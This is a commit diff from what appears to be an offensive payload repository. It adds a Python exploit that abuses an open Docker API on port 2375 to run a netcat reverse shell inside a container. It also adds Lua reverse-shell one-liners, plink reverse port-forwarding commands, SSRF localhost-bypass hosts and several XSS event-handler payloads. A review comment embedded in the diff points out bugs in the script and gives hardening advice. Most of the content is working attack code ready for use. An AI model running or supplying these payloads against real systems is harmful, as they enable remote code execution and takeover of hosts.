Script Docker RCE
This commit is contained in:
parent
f8019e2234
commit
f1eefd2722
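--- a/CVE Exploits/Docker API RCE.py
+++ b/CVE Exploits/Docker API RCE.py
@@ -0,0 +1,48 @@
+import requests
+import logging
+import json
+import urllib.parse
+
+# NOTE
+# Enable Remote API with the following command
+# /usr/bin/dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock
+# This is an intended feature, remember to filter the port 2375..
+
+name = "docker"
+description = "Docker RCE via Open Docker API on port 2375"
+author = "Swissky"
+
+# Step 1 - Extract id and name from each container
+ip = "127.0.0.1"
+port = "2375"
+data = "containers/json"
+url = "http://{}:{}/{}".format(ip, port, data)
+r = requests.get(url)
+
+if r.json:
+    for container in r.json():
+        container_id = container['Id']
+        container_name = container['Names'][0].replace('/','')
+        print(container_id, container_name)
+
+# Step 2 - Prepare command
+cmd = '["nc", "192.168.1.2", "4242", "-e", "/bin/sh"]'
+data = "containers/{}/exec".format(container_name)
+url = "http://{}:{}/{}".format(ip, port, data)
+post_json = '{ "AttachStdin":false,"AttachStdout":true,"AttachStderr":true, "Tty":false, "Cmd":'+cmd+' }'
+post_header = {
+    "Content-Type": "application/json"
+}
+r = requests.post(url, json=json.loads(post_json))
+
+
+# Step 3 - Execute command
+id_cmd = r.json()['Id']
+data = "exec/{}/start".format(id_cmd)
+url = "http://{}:{}/{}".format(ip, port, data)
+post_json = '{ "Detach":false,"Tty":false}'
+post_header = {
+    "Content-Type": "application/json"
+}
+r = requests.post(url, json=json.loads(post_json))
+print(r)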
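Review bot: `if r.json:` in the container-listing step tests the bound method object, which is always truthy, so the branch never guards against a failed or non-JSON response; the intended check is `if r.ok and r.json():` (or `r.raise_for_status()` before decoding). The `containers/{}/exec` line then reads `container_name` after the loop has finished, so it raises `NameError` when the list is empty, and `post_header` is built twice but never passed to `requests.post` (the `json=` argument already sets the content type, so the dict can be dropped). `import logging` and `import urllib.parse` are unused. The header comment would serve defenders better if it also said that binding the daemon to `tcp://0.0.0.0:2375` hands root-equivalent control of the host to anyone who can reach the port, and that the supported mitigation is to keep the API on the unix socket or require TLS client authentication (`--tlsverify`) rather than relying on port filtering alone.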
@ -92,6 +92,14 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
|
|||||||
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## plink
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server
|
||||||
|
plink -l root -pw mypassword 192.168.18.84 -R
|
||||||
|
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
|
||||||
|
```
|
||||||
|
|
||||||
## Basic Pivoting Types
|
## Basic Pivoting Types
|
||||||
|
|
||||||
| Type | Use Case |
|
| Type | Use Case |
|
||||||
|
@ -116,10 +116,18 @@ p.waitFor()
|
|||||||
|
|
||||||
### Lua
|
### Lua
|
||||||
|
|
||||||
|
Linux only
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Windows and Linux
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||||
|
```
|
||||||
|
|
||||||
### NodeJS
|
### NodeJS
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
|
@ -115,6 +115,7 @@ Grab a book and relax, these ones are the best security books (in my opinion).
|
|||||||
| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
|
| `docker pull owasp/zap2docker-stable` | [official OWASP ZAP](https://github.com/zaproxy/zaproxy) |
|
||||||
| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
|
| `docker pull wpscanteam/wpscan` | [official WPScan](https://hub.docker.com/r/wpscanteam/wpscan/) |
|
||||||
| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
|
| `docker pull infoslack/dvwa` | [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/infoslack/dvwa/) |
|
||||||
|
| `docker run --name dvna -p 9090:9090 -d appsecco/dvna:sqlite` | [Damn Vulnerable NodeJS Application](https://github.com/appsecco/dvna) |
|
||||||
| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
|
| `docker pull danmx/docker-owasp-webgoat` | [OWASP WebGoat Project docker image](https://hub.docker.com/r/danmx/docker-owasp-webgoat/) |
|
||||||
| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
|
| `docker pull opendns/security-ninjas` | [Security Ninjas](https://hub.docker.com/r/opendns/security-ninjas/) |
|
||||||
| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
|
| `docker pull ismisepaul/securityshepherd` | [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) |
|
||||||
|
@ -2,6 +2,11 @@
|
|||||||
|
|
||||||
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
|
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
|
||||||
|
|
||||||
|
Tools:
|
||||||
|
|
||||||
|
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
|
||||||
|
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
* [Exploit with localhost](#summary)
|
* [Exploit with localhost](#summary)
|
||||||
@ -85,7 +90,6 @@ Bypass localhost with a domain redirecting to locahost
|
|||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
http://localtest.me
|
http://localtest.me
|
||||||
http://n-pn.info
|
|
||||||
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -95,6 +95,11 @@ XSS for HTML5
|
|||||||
<details/open/ontoggle="alert`1`">
|
<details/open/ontoggle="alert`1`">
|
||||||
<audio src onloadstart=alert(1)>
|
<audio src onloadstart=alert(1)>
|
||||||
<marquee onstart=alert(1)>
|
<marquee onstart=alert(1)>
|
||||||
|
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
|
||||||
|
|
||||||
|
<body ontouchstart=alert(1)> // Triggers when a finger touch the screen
|
||||||
|
<body ontouchend=alert(1)> // Triggers when a finger is removed from touch screen
|
||||||
|
<body ontouchmove=alert(1)> // When a finger is dragged across the screen.
|
||||||
```
|
```
|
||||||
|
|
||||||
XSS using script tag (external payload)
|
XSS using script tag (external payload)
|
||||||
|